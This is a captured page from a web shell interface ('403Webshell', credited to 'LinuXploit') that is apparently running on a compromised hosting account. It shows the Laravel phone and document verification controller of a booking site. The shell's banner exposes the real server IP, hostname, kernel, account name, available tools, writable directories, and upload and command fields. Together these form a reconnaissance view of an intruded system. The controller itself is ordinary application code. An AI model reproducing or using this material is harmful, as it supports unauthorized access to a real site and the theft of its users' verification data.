403Webshell
Server IP : 66.29.132.124  /  Your IP : 18.222.98.91
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/book24.ng/modules/User/Controllers/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/book24.ng/modules/User/Controllers//VerificationController.php
<?php
namespace Modules\User\Controllers;

use App\User;
use Illuminate\Http\Request;
use Illuminate\Support\Arr;
use Illuminate\Support\Facades\Auth;
use Modules\FrontendController;
use Modules\Sms\Core\Facade\Sms;
use Modules\User\Events\UserVerificationSubmit;
use Propaganistas\LaravelPhone\PhoneNumber;

class VerificationController extends FrontendController
{
    public function index()
    {
        if( setting_item('user_disable_verification_feature')){
            return redirect(route("user.profile.index"));
        }
        $user = Auth::user();
        $data = [
            'fields'         => $user->verification_fields,
            'only_show_data' => 1,
            'breadcrumbs'    => [
                [
                    'name'  => __('Verification'),
                    'class' => 'active'
                ],
            ],
        ];
        return view('User::frontend.verification.index', $data);
    }

    public function update()
    {
        $user = Auth::user();
        $data = [
            'user'        => $user,
            'fields'      => $user->verification_fields,
            'breadcrumbs' => [
                [
                    'name' => __('Verification'),
                    'url'  => route('user.verification.index')
                ],
                [
                    'name'  => __('Update Verification Data'),
                    'class' => 'active'
                ],
            ],
        ];
        return view('User::frontend.verification.update', $data);
    }

    public function store()
    {

        /**
         * @var $user User
         */
        $user = Auth::user();
        $fields = $user->verification_fields;
        $rules = [];
        $messages = [];
        $input = \request()->input();
        foreach ($fields as $field) {
            if (!empty($field['required'])) {
                $rules[$field['field_id']][] = 'required';
                $messages[$field['field_id'] . '.required'] = __("The :name is required", ['name' => $field['name']]);
            }
            switch ($field['type']) {
                case "file":
                    if (!empty($input[$field['field_id']])) {
                        $rules[$field['field_id'] . '.path'][] = 'required';
                        $messages[$field['field_id'] . '.path.required'] = __("The :name path is required", ['name' => $field['name']]);
                        $input[$field['field_id']] = json_decode($input[$field['field_id']], true);
                    }
                    break;
                case "multi_files":
                    if (!empty($input[$field['field_id']])) {
                        $rules[$field['field_id'] . '.*.path'][] = 'required';
                        $messages[$field['field_id'] . '.*.path.required'] = __("The :name path is required", ['name' => $field['name']]);
                        foreach ($input[$field['field_id']] as $k => $val) {
                            $input[$field['field_id']][$k] = json_decode($val, true);
                        }
                    }
                    break;
            }
        }
        if (!empty($rules)) {
            \Validator::make($input, $rules, $messages)->validate();
        }
        $checkAll = false;
        foreach ($fields as $field) {
            $check = false;
            $old = $user->getVerifyData($field['id']);
            switch ($field['type']) {
                case "multi_files":
                    if ($old != json_encode(\request()->input($field['field_id']))) {
                        $check = true;
                    }
                    break;
                case "file":
                default:
                    if ($old != \request()->input($field['field_id'])) {
                        $check = true;
                    };
                    break;
            }
            if ($check) {
                $user->addMeta($field['field_id'], \request()->input($field['field_id']));
                $user->addMeta('is_verified_' . $field['id'], 0);
            }
            if ($check)
                $checkAll = true;
        }
        if ($checkAll) {
            $user->verify_submit_status = 'new';
            $user->is_verified = 0;
            $user->save();
            event(new UserVerificationSubmit($user));
        }
        return redirect()->back()->with('success', __("Verification data saved. Please wait for admin approval"));
    }

    public function sendCodeVerifyPhone(Request $request)
    {
        $user = Auth::user();
        $phone = $request->phone;
        $inputName = $request->inputName;
        $inputLabel = $request->inputLabel;
        if (empty($phone)) {
            return response()->json([
                'status'  => 0,
                'message' => __($inputLabel . ' is required.')
            ]);
        }
        $fields = $user->verification_fields;
        $phoneField = Arr::where($fields, function ($value, $key) use ($inputName) {
            if ($value['field_id'] == $inputName and empty($value['is_verified'])) {
                return $value;
            }
        });
        if (!empty($phoneField)) {
            //    		send sms
            try {
                $string = rand(100000, 999999);
                $message = __($string . ' is you verify code');
                $to = (string)PhoneNumber::make($phone)->ofCountry($user->country);
                Sms::to($to)->content($message)->send();
                $user->addMeta('verify_phone_data', [
                    $string => [
                        'phone'      => $phone,
                        'inputName'  => $inputName,
                        'inputLabel' => $inputLabel
                    ]
                ]);
                return response()->json([
                    'status' => 1,
                    'action' => 'openModalVerify',
                    'phone'  => $phone
                ]);
            } catch (\Exception $e) {
                return response()->json([
                    'status'  => 0,
                    'action'  => 'showError',
                    'phone'   => $phone,
                    'message' => $e->getMessage()
                ]);
            }
        } else {
            return response()->json([
                'status'   => 1,
                'verified' => 1,
                'phone'    => $phone,
                'message'  => __($inputLabel . ' verified')
            ]);
        }
    }

    public function verifyPhone(Request $request)
    {
        $user = Auth::user();
        $codeRequest = $request->code;
        $verifyData = json_decode($user->getMeta('verify_phone_data'), true);
        if (!empty($verifyData[$codeRequest])) {
            $data = $verifyData[$codeRequest];
            $fields = $user->verification_fields;
            $phoneField = Arr::where($fields, function ($value, $key) use ($data) {
                if ($value['field_id'] == $data['inputName']) {
                    return $value;
                }
            });
            if (!empty($phoneField)) {
                foreach ($phoneField as $field) {
                    $user->addMeta($field['field_id'], $data['phone']);
                    $user->addMeta('is_verified_' . $field['id'], 1);
                }
            }
            return response()->json([
                'status'   => 1,
                'verified' => 1
            ]);
        } else {
            return response()->json([
                'status'   => 0,
                'verified' => 0,
                'message'  => __('Verify code do not match')
            ]);
        }
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit